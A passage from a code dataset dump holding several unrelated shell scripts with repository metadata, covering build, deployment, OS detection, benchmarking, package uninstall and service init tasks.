-DCMAKE_INSTALL_PREFIX=${zShadowPath}/lib/libgit2 \
-DLIBSSH2_INCLUDEDIR=${zShadowPath}/lib/libssh2/include \
-DLIBSSH2_LIBDIR=`dirname ${zLibSshPath}` \
-DBUILD_SHARED_LIBS=ON \
-DBUILD_CLAR=OFF
cmake --build . --target install
fi
zLibGitPath=${zShadowPath}/lib/libgit2/lib64
if [[ 0 -eq `ls ${zLibGitPath} | wc -l` ]]; then zLibGitPath=${zShadowPath}/lib/libgit2/lib; fi
# Compile the main program. Static library paths must come after the source
# files; if static libs are used, zlib curl openssl crypto
# (-lz -lcurl -lssl -lcrypto) must be linked before this point.
###############################################
#    -I${zShadowPath}/lib/libpcre2/include \
#    -L${zLibPcrePath} \
#    -lpcre2-8 \
###############################################
clang -Wall -Wextra -std=c99 -O2 -lpthread \
-I${zShadowPath}/inc \
-I${zShadowPath}/lib/libssh2/include \
-L${zLibSshPath} \
-lssh2 \
-I${zShadowPath}/lib/libgit2/include \
-L${zLibGitPath} \
-lgit2 \
-o ${zShadowPath}/bin/git_shadow \
${zShadowPath}/src/zmain.c \
${zShadowPath}/src/run/*.c
strip ${zShadowPath}/bin/git_shadow
# Build the notice helper, used to inform the main program that a new commit
# record has been created.
clang -Wall -Wextra -std=c99 -O2 \
-I${zShadowPath}/inc \
-o ${zShadowPath}/tools/notice \
${zShadowPath}/src/zExtraUtils/znotice.c
strip ${zShadowPath}/tools/notice
export LD_LIBRARY_PATH=${zShadowPath}/lib/libssh2/lib64:${zShadowPath}/lib/libgit2/lib:$LD_LIBRARY_PATH
${zShadowPath}/bin/git_shadow -f ${zShadowPath}/conf/master.conf -h $zServAddr -p $zServPort >>${zShadowPath}/log/ops.log 2>>${zShadowPath}/log/err.log
# Background auto-restart-on-exit mechanism
# ${zShadowPath}/tools/zauto_restart.sh $zServAddr $zServPort &
| true
|
5f29b98d54207075a3ffa9cdf10dc00f2922c21b
|
Shell
|
deadcrew/deadfiles
|
/bin/wait-key
|
UTF-8
| 298
| 3.265625
| 3
|
[] |
no_license
|
#!/bin/bash
# wait-key: block until the key named in $1 is released.
key="${1}"
# Reuse (or create) a FIFO that the keypresses helper streams events into.
if [[ ! -e /tmp/waitkey ]]; then
mkfifo /tmp/waitkey
fi
# NOTE(review): 'keypresses' is an external helper assumed to emit lines like
# "KeyRelease <code> [<name>]" — format inferred from the parsing below; confirm.
keypresses >/tmp/waitkey &
pid=$!
# Read events word-by-word until the requested key's release shows up.
while read -a chunks; do
if [[ "${chunks[0]}" == "KeyRelease" && "${chunks[2]}" == "[$key]" ]]; then
break
fi
done </tmp/waitkey
# Kill the helper's child process(es); the FIFO is intentionally left behind
# for reuse on the next invocation.
kill $(ps -o pid= --ppid $pid)
| true
|
f1d09dabe6e72ee069477fa569c46c307239dd09
|
Shell
|
fabianlee/microk8s-nginx-istio
|
/tf-libvirt/create-snapshot.sh
|
UTF-8
| 656
| 3.046875
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
# Create an external disk-only libvirt snapshot of the microk8s VM's vda disk
# in the default storage pool (the hdd device is excluded from the snapshot).
thedomain="microk8s-1-192.168.122.210"
thedisk="microk8s-1"
snapshotname="initial"
# NOTE(review): targetdisk is defined but the snapshot command below hardcodes
# "vda" in its --diskspec instead of using this variable — confirm intent.
targetdisk="vda"
# look at '<disk>' types, can have type other than file
virsh dumpxml $thedomain | grep '<disk' -A5
# show block level devices
virsh domblklist $thedomain
# pull default pool path from xml
pooldir=$(virsh pool-dumpxml default | grep -Po "(?<=path\>)[^<]+")
echo "default pool dir: $pooldir"
# create snapshot in default pool location
set -ex
virsh snapshot-create-as $thedomain --name $snapshotname --disk-only --diskspec vda,file=$pooldir/$thedisk.$snapshotname --diskspec hdd,snapshot=no
# list snapshot
virsh snapshot-list $thedomain
| true
|
ac30d8eb73ca7134f3c309daba6dc0bb1ef691cc
|
Shell
|
Dilhasha/AppFacCLI
|
/execute/build-all
|
UTF-8
| 532
| 2.53125
| 3
|
[] |
no_license
|
#!/bin/bash
# Cross-compile the appfac CLI for every supported GOOS/GOARCH pair.
set -e
set -x

OUTDIR=$(dirname $0)/../outNw

# Build once for the given arch/os and copy the binary under a platform name.
build_target() {
  GOARCH=$1 GOOS=$2 $(dirname $0)/build && cp $OUTDIR/appfac $OUTDIR/appfac-$3
}

build_target amd64 windows windows-amd64.exe
build_target 386   windows windows-386.exe
build_target amd64 linux   linux-amd64
build_target 386   linux   linux-386
build_target amd64 darwin  darwin-amd64
| true
|
aeb5d5620484ebd15482b1ad243c475d3c5cc97a
|
Shell
|
firstandthird/continuous
|
/scripts/push/default
|
UTF-8
| 1,098
| 3.640625
| 4
|
[] |
no_license
|
#!/bin/bash
# Build the repository's image with the builder container, then replace the
# running container with the new image, reporting outcomes to Slack.

BUILDER="firstandthird/builder:0.0.7"
docker pull $BUILDER > /dev/null 2>&1

# The builder prints the resulting image tag on stdout.
if ! IMAGE=$(docker run \
  --rm \
  -e USER=$GITHUB_USER \
  -e REPO=$GITHUB_REPO \
  -e BRANCH=$GITHUB_BRANCH \
  -e TOKEN=$GITHUB_TOKEN \
  -v /var/run/docker.sock:/var/run/docker.sock \
  -v /repos:/repos \
  ${BUILDER}); then
  echo "there was an error building"
  post2slack --tags error --message "$GITHUB_REPO#$GITHUB_BRANCH failed to build $IMAGE"
  exit 1
fi
echo "$IMAGE built"

NAME=$(bash /scripts/lib/get-container-name)
# Remove any previous instance of the container before redeploying.
if docker inspect $NAME > /dev/null 2>&1; then
  echo "$NAME exists, removing first"
  docker stop $NAME
  docker rm $NAME
fi

HOST=$(bash /scripts/lib/get-virtual-host)
if ! docker run -d \
  --name $NAME \
  --env VIRTUAL_HOST=$HOST \
  --env NODE_ENV=$APP_NODE_ENV \
  $IMAGE; then
  echo "error running $NAME"
  post2slack --tags error --message "error starting $GITHUB_REPO#$GITHUB_BRANCH"
fi
echo "$NAME deployed to $HOST"
post2slack --tags success --message "$GITHUB_REPO#$GITHUB_BRANCH deployed to $HOST"
| true
|
07d5a751be0967fb02ca12b50a4982d65f289878
|
Shell
|
fontes99/ORM-Cloud-project
|
/install.sh
|
UTF-8
| 213
| 2.609375
| 3
|
[] |
no_license
|
#!/bin/bash
# Install the task-list launcher (with the repo path baked in) and run setup.
# BUG FIX: without `set -e` the script printed 'INSTALL completed' even when
# a step (template missing, sudo denied, python failure) had failed.
set -e
mkdir -p keys
chmod +x task-list-template
# Bake the absolute repository path into the launcher script.
sed -e "s|path_to_pedro|$(pwd)|g" task-list-template > task-list
chmod +x task-list
sudo mv task-list /usr/bin/
python3 main.py
echo 'INSTALL completed'
| true
|
60a74d52002758e215828782637cd36eca92c807
|
Shell
|
elsayed-lab/gene-structure-analysis
|
/scripts/lmajor_friedlin/S01_count_total_reads.sh
|
UTF-8
| 537
| 3.421875
| 3
|
[] |
no_license
|
#!/usr/bin/env sh
#
# Counts the total number of reads uses as input for gene structure analysis.
#
# Output: a CSV of (sample_id, num_reads_total), one row per sample, where the
# total is the sum of R1 and R2 reads. Requires $SCRATCH to be set.
outfile="../../input/lmajor_hsapiens/S01_num_reads_total.csv"
echo "sample_id,num_reads_total" > $outfile
for x in $SCRATCH/utr_analysis/lmajor-infecting-hsapiens-*/input/HPGL*/processed/*R1*.gz; do
# Sample id is the first HPGL<digits> token in the path.
sample_id=$(echo $x | egrep -o "HPGL[0-9]+" | head -1)
# FASTQ stores one read per 4 lines, hence the division by 4.
num_reads_r1=$(( $(zcat $x | wc -l) / 4 ))
# The mate file path is derived by substituting R1 -> R2.
num_reads_r2=$(( $(zcat ${x/R1/R2} | wc -l) / 4 ))
printf "%s,%d\n" $sample_id $(($num_reads_r1 + $num_reads_r2)) >> $outfile
done
| true
|
fb9292d8d0a950bc099b931c5cc2f1a65b6a8cd8
|
Shell
|
oxfordcontrol/osqp-wheels
|
/config.sh
|
UTF-8
| 1,310
| 3.21875
| 3
|
[
"Apache-2.0"
] |
permissive
|
# Define custom utilities
# Test for OSX with [ -n "$IS_OSX" ]
# Location of the osqp-python checkout used by run_tests.
TESTS_DIR="$(pwd)/osqp-python"
# Ensure a working cmake: via Homebrew on macOS, or via pip on Linux with the
# pip-installed binary symlinked over the interpreter-local shim.
function fix_cmake {
if [ -n "$IS_OSX" ]; then
brew update
brew upgrade cmake || brew install cmake
else
# Fix cmake installation linking the appropriate binary
pip install cmake
# Remove the cmake shim that sits next to the python executable...
rm `python -c 'import sys; print(sys.executable[:-6])'`cmake
# ...and point /usr/local/bin/cmake at the real binary inside site-packages.
CMAKE_BIN=`python -c "from distutils.sysconfig import get_python_lib; print(get_python_lib())"`/cmake/data/bin/cmake
ln -sf ${CMAKE_BIN} /usr/local/bin/cmake
fi
}
function pre_build {
  # Pre-build hook, invoked from the root of this repository before any
  # wheel is built. The only preparation needed is repairing the cmake
  # installation so the native build can find a working binary.
  fix_cmake
}
# Test hook: repairs cmake, publishes an sdist once (Linux + Python 3.6 job
# only, to avoid duplicates), then runs the pytest suite.
function run_tests {
# Fix cmake installation linking the appropriate binary
fix_cmake
# Create source distribution and put into wheelhouse
if [ -z "$IS_OSX" ] && [ "$MB_PYTHON_VERSION" == "3.6" ]; then
cd ${TESTS_DIR}; python setup.py sdist --dist-dir /io/wheelhouse/;
echo "Created source distribution in /io/wheelhouse"
fi
# Runs tests on installed distribution from an empty directory
python --version
# python -c 'import sys; import yourpackage; sys.exit(yourpackage.test())'
# MKL-dependent tests are excluded (not available in this environment).
cd ${TESTS_DIR}; python -m pytest -k 'not mkl_'
}
| true
|
a62aeba6ef025b05e6562f3bd4d476730c0da4d8
|
Shell
|
ondras12345/CNC
|
/pcb2gcode/generate
|
UTF-8
| 1,622
| 2.640625
| 3
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash
# Emit a pcb2gcode `millproject` configuration file to stdout.
# Set DOUBLE_SIDED to any non-empty value to include front-side settings,
# the alignment-pin mirror axis, and the drill-side explanation.
# NOTE: everything inside the heredoc below is OUTPUT content, not script
# logic; the embedded $( ... ) blocks execute at generation time.
cat <<EOF
# Copy this file to your gerber directory and name it \`millproject\`
# See \`man pcb2gcode\`

# Set paths to gbr files
back=
drill=
outline=
$(
if [ -n "$DOUBLE_SIDED" ] ; then
cat <<EOF2
front=

# Alignment pins
# You need to decide where to drill alignment holes.
# For example, you can put them in the middle of the board.
mirror-axis=0mm
EOF2
fi
)

# Machine settings
metric=true
metricoutput=true
zsafe=2
spinup-time=1
zchange=10
# zchange-absolute interacts badly with bCNC autolevel.
#zchange-absolute=true
g0-vertical-speed=500
g0-horizontal-speed=800
nog81=true
# Keep M6 and handle in bCNC
#nom6=true
nog64=true

# Optimization
# TODO
#optimise=?
#path-finding-limit=?

# Milling
mill-diameters=1.0mm,0.39mm
mill-feed=200
mill-vertfeed=80
mill-speed=10000
zwork=-0.12
# Voronoi mode (not tested)
#voronoi=true
#preserve-thermal-reliefs=true

# Drilling
$(
if [ -n "$DOUBLE_SIDED" ] ; then
cat <<EOF2
# Even for double sided board, we want to drill from the front side.
# It might be tempting to drill from the front and use the bit to drill
# alignment holes, but that would interfere with back side autolevelling in
# bCNC.
EOF2
fi
echo "drill-side=back"
)
zdrill=-1.75
drill-feed=120
drill-speed=10000
drills-available=0.8mm:-0.3mm:+0.1mm,1.0mm:-0.2mm:+0.2mm
zmilldrill=-1.60
milldrill-diameter=1.0
min-milldrill-hole-diameter=1.2  # TODO need 1.0 for 1mm slots
# outline (cut-) feeds and speeds are used

# Outline
cutter-diameter=1.0
zcut=-1.65
cut-feed=80
cut-vertfeed=30
cut-speed=10000
cut-infeed=0.8
cut-side=back
bridges=2mm
zbridges=-0.8mm
bridgesnum=2
EOF
| true
|
09982af7f7590e5b056113ddfa6fb1de694c0d2b
|
Shell
|
mannysah/how-to-run-minishift-locally-mac
|
/create-sample.sh
|
UTF-8
| 1,123
| 2.703125
| 3
|
[
"MIT"
] |
permissive
|
# Deploy sample apps into a local Minishift: a Node.js example, then a Spring
# Boot image that is built, pushed to the internal registry, and promoted from
# the dev project to the it (integration-test) project.
#Set the environment again
eval $(minishift oc-env)
eval $(minishift docker-env)
# Authenticate docker against the Minishift-internal registry with the oc token.
docker login -u $(oc whoami) -p $(oc whoami -t) $(minishift openshift registry)
#New NODE APP
oc new-app https://github.com/openshift/nodejs-ex -l name=nodejs-ex-app
oc expose svc/nodejs-ex
echo ""
echo "MINISHIFT REGISTRY IS:"
minishift openshift registry
#NEW SPRING BOOT APP
cd samples/sample-springboot/ && mvn clean package
docker build . -t $(minishift openshift registry)/dev-spring-project/springboot:dev
docker images | grep springboot
docker push $(minishift openshift registry)/dev-spring-project/springboot:dev
oc project dev-spring-project
oc new-app --image-stream=springboot:dev --name=springboot
oc expose service springboot
oc get pods
oc get routes
echo "Starting IT SETUP"
# Promote the dev image to the IT project by retagging and re-pushing.
docker tag $(minishift openshift registry)/dev-spring-project/springboot:dev $(minishift openshift registry)/it-spring-project/springboot:it
docker push $(minishift openshift registry)/it-spring-project/springboot:it
oc project it-spring-project
oc new-app --image-stream=springboot:it --name=springboot
oc expose service springboot
| true
|
ca247118ab467e75ddd5b4bb4ab4d4d1a128c977
|
Shell
|
gchen88gh/SH-projects
|
/a.sh
|
UTF-8
| 258
| 2.59375
| 3
|
[] |
no_license
|
# Shadow `curl` with a function that logs the invocation and then delegates
# to the real binary (full path avoids recursing into this function).
function curl()
{
#
# NB: $0 is the script name here, not the function name "curl".
echo "inside func - $0"
# BUG FIX: "$@" is quoted so arguments containing spaces (URLs with query
# strings, -H headers, etc.) are forwarded as distinct words, not re-split.
/usr/bin/curl "$@"
}
#
SERVER=srwp01abi001
# Direct call to the real binary for comparison with the wrapped call below.
/usr/bin/curl -s http://$SERVER.myweb.com/jmx-console/ | grep "$SERVER"
echo 'called by func curl'
curl -s http://$SERVER.myweb.com/jmx-console/ | grep "$SERVER"
| true
|
ae8af29faad70d90788e9920250af846cd263a94
|
Shell
|
kaneawk/oneinstack
|
/include/check_os.sh
|
UTF-8
| 4,796
| 3.28125
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
# Author:  yeho <lj2007331 AT gmail.com>
# BLOG:  https://linuxeye.com
#
# Notes: OneinStack for CentOS/RedHat 7+ Debian 8+ and Ubuntu 16+
#
# Project home page:
#       https://oneinstack.com
#       https://github.com/oneinstack/oneinstack

# Detect the package manager; RPM-based systems ship /usr/bin/yum.
if [ -e "/usr/bin/yum" ]; then
PM=yum
# CentOS 6 is EOL: repoint its repos at the vault archive.
if [ -e /etc/yum.repos.d/CentOS-Base.repo ] && grep -Eqi "release 6." /etc/redhat-release; then
sed -i "s@centos/\$releasever@centos-vault/6.10@g" /etc/yum.repos.d/CentOS-Base.repo
sed -i 's@centos/RPM-GPG@centos-vault/RPM-GPG@g' /etc/yum.repos.d/CentOS-Base.repo
[ -e /etc/yum.repos.d/epel.repo ] && rm -f /etc/yum.repos.d/epel.repo
fi
# lsb_release is needed below; the providing package differs per distro.
if ! command -v lsb_release >/dev/null 2>&1; then
if [ -e "/etc/euleros-release" ]; then
yum -y install euleros-lsb
elif [ -e "/etc/openEuler-release" -o -e "/etc/openeuler-release" ]; then
yum -y install openeuler-lsb
else
yum -y install redhat-lsb-core
fi
clear
fi
fi
if [ -e "/usr/bin/apt-get" ]; then
PM=apt-get
command -v lsb_release >/dev/null 2>&1 || { apt-get -y update > /dev/null; apt-get -y install lsb-release; clear; }
fi
# Abort if lsb_release still cannot be installed.
command -v lsb_release >/dev/null 2>&1 || { echo "${CFAILURE}${PM} source failed! ${CEND}"; kill -9 $$; exit 1; }
[ -e "/etc/anolis-release" ] && { command -v lsb_release >/dev/null 2>&1 || yum -y install system-lsb-core; }

# Get OS Version
OS=$(lsb_release -is)
ARCH=$(arch)
# Normalize each derivative distro onto an RHEL/Debian/Ubuntu base version.
if [[ "${OS}" =~ ^CentOS$|^CentOSStream$|^RedHat$|^Rocky$|^AlmaLinux$|^Fedora$|^Amazon$|^AlibabaCloud$|^AlibabaCloud\(AliyunLinux\)$|^AnolisOS$|^EulerOS$|^openEuler$|^Oracle$ ]]; then
LikeOS=RHEL
RHEL_ver=$(lsb_release -rs | awk -F. '{print $1}' | awk '{print $1}')
[[ "${OS}" =~ ^Fedora$ ]] && [ ${RHEL_ver} -ge 19 >/dev/null 2>&1 ] && { RHEL_ver=7; Fedora_ver=$(lsb_release -rs); }
[[ "${OS}" =~ ^Amazon$|^EulerOS$|^openEuler$ ]] && RHEL_ver=7
[[ "${OS}" =~ ^openEuler$ ]] && [[ "${RHEL_ver}" =~ ^21$ ]] && RHEL_ver=8
[[ "${OS}" =~ ^AlibabaCloud$|^AlibabaCloud\(AliyunLinux\)$ ]] && [[ "${RHEL_ver}" =~ ^2$ ]] && RHEL_ver=7
[[ "${OS}" =~ ^AlibabaCloud$|^AlibabaCloud\(AliyunLinux\)$ ]] && [[ "${RHEL_ver}" =~ ^3$ ]] && RHEL_ver=8
elif [[ "${OS}" =~ ^Debian$|^Deepin$|^Uos$|^Kali$ ]]; then
LikeOS=Debian
Debian_ver=$(lsb_release -rs | awk -F. '{print $1}' | awk '{print $1}')
[[ "${OS}" =~ ^Deepin$|^Uos$ ]] && [[ "${Debian_ver}" =~ ^20$ ]] && Debian_ver=10
[[ "${OS}" =~ ^Kali$ ]] && [[ "${Debian_ver}" =~ ^202 ]] && Debian_ver=10
elif [[ "${OS}" =~ ^Ubuntu$|^LinuxMint$|^elementary$ ]]; then
LikeOS=Ubuntu
Ubuntu_ver=$(lsb_release -rs | awk -F. '{print $1}' | awk '{print $1}')
if [[ "${OS}" =~ ^LinuxMint$ ]]; then
[[ "${Ubuntu_ver}" =~ ^18$ ]] && Ubuntu_ver=16
[[ "${Ubuntu_ver}" =~ ^19$ ]] && Ubuntu_ver=18
[[ "${Ubuntu_ver}" =~ ^20$ ]] && Ubuntu_ver=20
fi
if [[ "${OS}" =~ ^elementary$ ]]; then
[[ "${Ubuntu_ver}" =~ ^5$ ]] && Ubuntu_ver=18
[[ "${Ubuntu_ver}" =~ ^6$ ]] && Ubuntu_ver=20
fi
fi

# Check OS Version
if [ ${RHEL_ver} -lt 7 >/dev/null 2>&1 ] || [ ${Debian_ver} -lt 8 >/dev/null 2>&1 ] || [ ${Ubuntu_ver} -lt 16 >/dev/null 2>&1 ]; then
echo "${CFAILURE}Does not support this OS, Please install CentOS 7+,Debian 8+,Ubuntu 16+ ${CEND}"
kill -9 $$; exit 1;
fi

# Old gcc cannot build recent redis; fall back to the older redis release.
command -v gcc > /dev/null 2>&1 || $PM -y install gcc
gcc_ver=$(gcc -dumpversion | awk -F. '{print $1}')
[ ${gcc_ver} -lt 5 >/dev/null 2>&1 ] && redis_ver=${redis_oldver}

# Detect ARM platforms and their specific variant.
if uname -m | grep -Eqi "arm|aarch64"; then
armplatform="y"
if uname -m | grep -Eqi "armv7"; then
TARGET_ARCH="armv7"
elif uname -m | grep -Eqi "armv8"; then
TARGET_ARCH="arm64"
elif uname -m | grep -Eqi "aarch64"; then
TARGET_ARCH="aarch64"
else
TARGET_ARCH="unknown"
fi
fi

# Windows Subsystem for Linux detection (kernel release ends in -Microsoft).
if [ "$(uname -r | awk -F- '{print $3}' 2>/dev/null)" == "Microsoft" ]; then
Wsl=true
fi

# Only 64-bit userlands are supported; pick per-component arch suffixes.
if [ "$(getconf WORD_BIT)" == "32" ] && [ "$(getconf LONG_BIT)" == "64" ]; then
if [ "${TARGET_ARCH}" == 'aarch64' ]; then
SYS_ARCH=arm64
SYS_ARCH_i=aarch64
SYS_ARCH_n=arm64
else
SYS_ARCH=amd64 #openjdk
SYS_ARCH_i=x86-64 #ioncube
SYS_ARCH_n=x64 #nodejs
fi
else
echo "${CWARNING}32-bit OS are not supported! ${CEND}"
kill -9 $$; exit 1;
fi

THREAD=$(grep 'processor' /proc/cpuinfo | sort -u | wc -l)

# Map distro/version to the OpenSSL library generation Percona binaries need.
# Percona binary: https://www.percona.com/doc/percona-server/5.7/installation.html#installing-percona-server-from-a-binary-tarball
if [ ${Debian_ver} -lt 9 >/dev/null 2>&1 ]; then
sslLibVer=ssl100
elif [ "${RHEL_ver}" == '7' ] && [ "${OS}" != 'Fedora' ]; then
sslLibVer=ssl101
elif [ ${Debian_ver} -ge 9 >/dev/null 2>&1 ] || [ ${Ubuntu_ver} -ge 16 >/dev/null 2>&1 ]; then
sslLibVer=ssl102
elif [ ${Fedora_ver} -ge 27 >/dev/null 2>&1 ]; then
sslLibVer=ssl102
elif [ "${RHEL_ver}" == '8' ]; then
sslLibVer=ssl1:111
else
sslLibVer=unknown
fi
| true
|
8b90281cc01d40a15f3a2016ee1b4d0784f6ab8f
|
Shell
|
cviorel/dotfiles-1
|
/scripts/arch/install_gpu_drivers.sh
|
UTF-8
| 435
| 3.21875
| 3
|
[
"Unlicense"
] |
permissive
|
#!/bin/sh
# Install GPU drivers matching the vendor reported by `get-gpu-vendor`.
set -eu

gpu_vendor="$(get-gpu-vendor)"

# BUG FIX: the first test previously ended in a single `&`, which ran it in
# the background and made the `if` depend ONLY on the config-file check —
# so the NVIDIA branch could run on non-NVIDIA machines. `&&` is intended.
if
	[ "$gpu_vendor" = "nvidia" ] &&
	[ ! -f "/etc/X11/xorg.conf.d/20-nvidia.conf" ]
then
	yay -S --noconfirm nvidia nvidia-settings >/dev/null

	# generate an X11 config using NVIDIA's tool
	sudo nvidia-xconfig --output-xconfig="/etc/X11/xorg.conf.d/20-nvidia.conf" >/dev/null
fi

if [ "$gpu_vendor" = "amd" ]; then
	echo "TODO(#28): install AMD/ATI GPU drivers if detected"
fi
| true
|
d99dc657ff46749a57d46b5746a13260be299602
|
Shell
|
openshift/release
|
/ci-operator/step-registry/openshift-qe/router-perf/openshift-qe-router-perf-commands.sh
|
UTF-8
| 1,378
| 2.71875
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
# CI step: run the cloud-bulldozer router (ingress) performance benchmark
# against the cluster and upload results to the QE Elasticsearch instance.
set -o errexit
set -o nounset
set -o pipefail
set -x

cat /etc/os-release
oc config view
oc projects
python --version

pushd /tmp
python -m virtualenv ./venv_qe
source ./venv_qe/bin/activate

# ES credentials and the Google service account come from mounted secrets.
ES_PASSWORD=$(cat "/secret/password")
ES_USERNAME=$(cat "/secret/username")
GSHEET_KEY_LOCATION="/ga-gsheet/gcp-sa-account"
export GSHEET_KEY_LOCATION

git clone https://github.com/cloud-bulldozer/e2e-benchmarking --depth=1
pushd e2e-benchmarking/workloads/router-perf-v2

# ES configuration
# NOTE(review): credentials are embedded in the URL; `set -x` will echo this
# line into the CI log — confirm the log is access-restricted.
export ES_SERVER="https://$ES_USERNAME:$ES_PASSWORD@search-ocp-qe-perf-scale-test-elk-hcm7wtsqpxy7xogbu72bor4uve.us-east-1.es.amazonaws.com"
export ES_INDEX='router-test-results'

# Environment setup
export LARGE_SCALE_THRESHOLD='24'
export TERMINATIONS='mix'
export DEPLOYMENT_REPLICAS='1'
export SERVICE_TYPE='NodePort'
export NUMBER_OF_ROUTERS='2'
export HOST_NETWORK='true'
export NODE_SELECTOR='{node-role.kubernetes.io/worker: }'

# Benchmark configuration
export RUNTIME='60'
export SAMPLES='2'
export KEEPALIVE_REQUESTS='0 1 50'
export LARGE_SCALE_ROUTES='500'
export LARGE_SCALE_CLIENTS='1 80'
export LARGE_SCALE_CLIENTS_MIX='1 25'
export SMALL_SCALE_CLIENTS='1 400'
export SMALL_SCALE_CLIENTS_MIX='1 125'
export GEN_CSV='true'
export EMAIL_ID_FOR_RESULTS_SHEET='ocp-perfscale-qe@redhat.com'

# Stream benchmark output into the shared CI artifact file as well.
rm -rf "${SHARED_DIR}/${OUTPUT_FILE:?}"
./ingress-performance.sh |& tee "${SHARED_DIR}/${OUTPUT_FILE}"
| true
|
32dab02db96d5cf9bd3f84dbbdb915bae121ce40
|
Shell
|
Amr344/fpm-recipes
|
/recipes/graylog-server/files/post-uninstall
|
UTF-8
| 846
| 3.65625
| 4
|
[] |
no_license
|
#!/bin/sh
# Post-uninstall hook for graylog-server packages (shared by DEB and RPM).
# $1 encodes how the package manager invoked us; it decides whether the
# server's data, logs, user and group are wiped as well.
set -e

user="graylog"
group="graylog"
datadir="/var/lib/graylog-server"
logdir="/var/log/graylog-server"

remove_data="false"

case "$1" in
  purge|0)
    # DEB purge / RPM full removal: wipe data too.
    remove_data="true"
    ;;
  remove|1)
    # DEB remove / RPM upgrade: keep data on disk.
    remove_data="false"
    ;;
  upgrade|failed-upgrade|abort-install|abort-upgrade|disappear)
    : # DEB upgrade/abort paths — nothing to do here.
    ;;
  *)
    echo "[ERROR] post-uninstall script called with unknown argument: '$1'"
    exit 1
    ;;
esac

if [ "$remove_data" = "true" ]; then
  rm -rf "$datadir" "$logdir"
  rm -f /etc/graylog/server/node-id
  rm -f /etc/init/graylog-server.override

  # Drop the service account and its group if they still exist.
  if id "$user" > /dev/null 2>&1 ; then
    userdel "$user" || true
  fi
  if getent group "$group" > /dev/null 2>&1 ; then
    groupdel "$group" || true
  fi
fi

exit 0
| true
|
2d16baf9c72b7f5b9f725deffc9b53f31d40dbcc
|
Shell
|
input-output-hk/mailchimp-subscribe
|
/scripts/tag_release.sh
|
UTF-8
| 331
| 3.453125
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# Tag the current commit with the package version (vX.Y.Z) and push the tag.
# Refuses to run outside of CI.
if [ "$CI" != "true" ]; then
  echo ""
  echo "Can only use the tag release script on CI"
  echo ""
  exit 1
fi

PACKAGE_VERSION=$(node ./scripts/getPackageVersion.js)
# BUG FIX: v$PACKAGE_VERSION is now quoted everywhere so an empty or
# space-containing version cannot word-split into wrong arguments.
TAG_EXISTS=$(./scripts/tag_exists.sh "v$PACKAGE_VERSION")

# Only create the tag when it does not exist yet.
if [[ $TAG_EXISTS == "false" ]]; then
  git tag "v$PACKAGE_VERSION"
  git push origin --tags
fi
| true
|
febb7545f78408552c4f2532c039c6260764f3bf
|
Shell
|
nickivanov/db2_autostart_scripts
|
/db2_sles
|
UTF-8
| 3,326
| 3.984375
| 4
|
[
"Apache-2.0"
] |
permissive
|
#! /bin/sh
#
# /etc/init.d/db2
#
#
# System startup script for the DB2 instances.
# Will start/stop whatever instances are enabled to
# start at boot time in the DB2 global registry.
# See the DB2 Information Center for the db2greg
# utility for more details.
#
# This will probably only work on SuSE Linux
#
# To install:
# - copy the file to /etc/init.d
# - run chkconfig -add db2
#
#
# Copyright 2013 Nick Ivanov
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
### BEGIN INIT INFO
# Provides:          db2
# Required-Start:    $local_fs
# Required-Stop:     $local_fs
# X-Start-Before:    $network
# X-Stop-After:      $network
# Default-Start:     3 5
# Default-Stop:      0 1 2 6
# Short-Description: DB2 instance processes
### END INIT INFO
. /etc/rc.status
# Shell functions sourced from /etc/rc.status:
#      rc_check         check and set local and overall rc status
#      rc_status        check and set local and overall rc status
#      rc_status -v     ditto but be verbose in local rc status
#      rc_status -v -r  ditto and clear the local rc status
#      rc_failed        set local and overall rc status to failed
#      rc_reset         clear local rc status (overall remains)
#      rc_exit          exit appropriate to overall rc status
# First reset status of this service
rc_reset
# DB2 installation path; only one if multiple versions installed
DB2_INSTALL_PATH=/opt/ibm/db2/V10.1
# Emit "instance_name instance_dir autostart_flag" triples, one per DB2
# instance registered in the global registry (db2greg "I,DB2,..." records).
list_instances() {
$DB2_INSTALL_PATH/bin/db2greg -dump | grep -E '^I,DB2' | \
cut -d, --output-delimiter=" " -s -f4,5,7
}
case "$1" in
start)
echo "Starting DB2 instances "
# read DB2 instances from the global registry
list_instances | while read INST INSTDIR AUTOSTART
do
# Only start instances flagged for autostart.
if [ $AUTOSTART -eq 1 ]
then
echo -n " $INST"
# Start as the instance owner; backgrounded so boot is not serialized.
su - $INST -c $INSTDIR/adm/db2start>/dev/null& # send to background
rc_status -v
fi
done
;;
status)
echo "Checking for DB2 instances..."
## Check status with checkproc(8), if process is running
## checkproc will return with exit status 0.
# Status has a slightly different for the status command:
# 0 - service running
# 1 - service dead, but /var/run/  pid file exists
# 2 - service dead, but /var/lock/ lock file exists
# 3 - service not running
list_instances | while read INST INSTDIR AUTOSTART
do
echo -n " $INST"
checkproc $INSTDIR/adm/db2sysc
rc_status -v
done
;;
stop)
echo "Stopping DB2 instances..."
list_instances | while read INST INSTDIR AUTOSTART
do
# Only attempt to stop instances whose engine process is running.
checkproc $INSTDIR/adm/db2sysc
RC=$?
if [ $RC -eq 0 ]
then
echo -n " $INST"
su - $INST -c "$INSTDIR/adm/db2stop force">/dev/null # wait for it to stop
rc_status -v
fi
done
;;
*)
echo "Usage: $0 {start|stop|status}"
exit 1
;;
esac
rc_exit
| true
|
ee6e1dd907ead5514afb131f14e501ad66437de3
|
Shell
|
KubaHyzicki/scripts
|
/cb
|
UTF-8
| 696
| 3.65625
| 4
|
[] |
no_license
|
#!/usr/bin/env bash
#_source
#WARNING: requires xdotool installed!!!
# cb: copy arguments (or, with -f, a file's contents) to the X clipboard.
# NOTE(review): the "#_source" marker and the use of `return` indicate this
# script is meant to be sourced into the interactive shell, not executed.
if [[ $1 == "--help" ]]
then #using xsel couse xclip is not working and this one requires a little more specific eval
echo "script copying input to clipboard
WARNING: requires xdotool installed!!!
to copy args type: cb \$arg1 \$arg2...
to copy file insides type: cb -f \$fileName"
return
fi
if [[ -z $1 ]]
then
